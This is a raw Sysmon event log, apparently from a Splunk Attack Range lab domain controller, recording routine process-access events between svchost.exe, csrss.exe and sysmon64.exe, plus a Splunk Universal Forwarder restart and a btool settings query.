13:36:31.825{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.825{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.825{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.825{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.825{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.825{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EDF-6005-9F00-00000000A301}4592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.825{59A5CD1D-8EDF-6005-9E00-00000000A301}47284532C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{59A5CD1D-8EDF-6005-9F00-00000000A301}4592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+146d6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d8a0|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.835{59A5CD1D-8EDF-6005-9F00-00000000A301}4592C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EDF-6005-9E00-00000000A301}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2532 10341000x80000000000000003340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.825{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EDF-6005-9E00-00000000A301}4728C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.825{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.825{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.810{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.810{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.810{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.810{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.810{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.810{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.810{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.810{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EDF-6005-9E00-00000000A301}4728C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.810{59A5CD1D-8EDF-6005-9D00-00000000A301}47004752C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EDF-6005-9E00-00000000A301}4728C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d40f|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.824{59A5CD1D-8EDF-6005-9E00-00000000A301}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2532C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{59A5CD1D-8EDF-6005-9D00-00000000A301}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk.exesplunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2532 10341000x80000000000000003327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.794{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EDF-6005-9D00-00000000A301}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.794{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.794{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.794{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.794{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.794{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 